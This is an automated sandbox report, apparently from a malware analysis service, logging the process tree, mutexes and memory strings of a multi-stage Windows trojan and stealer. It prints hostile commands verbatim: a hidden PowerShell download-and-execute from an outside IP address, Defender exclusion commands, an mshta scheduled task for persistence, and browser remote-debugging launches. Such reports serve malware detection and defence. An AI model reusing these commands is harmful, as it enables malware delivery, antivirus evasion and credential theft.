                                    Source: random[1].exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: random[1].exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: 18.3.skotes.exe.140fb98.1.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 18.3.skotes.exe.140fb98.1.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: 18.3.skotes.exe.149e220.0.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 18.3.skotes.exe.149e220.0.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: cbfb8a9c89.exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: cbfb8a9c89.exe.18.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@154/1065@0/23
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C460300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,3_2_6C460300
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\V0YXXVJL.htmJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2372:120:WilError_03
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mnn.exe")
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                    Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nnu.exe")
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                    Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "svdhost.exe")
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578895334.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578799964.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1590194970.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1590083144.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.2070231407.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941073654.00000000059D5000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2343336888.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2318127176.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2325919974.0000000003A6D000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4811996878.000000000349A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                    Source: EdYEXasNiR.exeVirustotal: Detection: 56%
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile read: C:\Users\user\Desktop\EdYEXasNiR.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\EdYEXasNiR.exe "C:\Users\user\Desktop\EdYEXasNiR.exe"
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe"
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess created: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe "C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3
                                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\wOXcVegx\jyidkjkfhjawd.exe "C:\wOXcVegx\jyidkjkfhjawd.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe"Jump to behavior
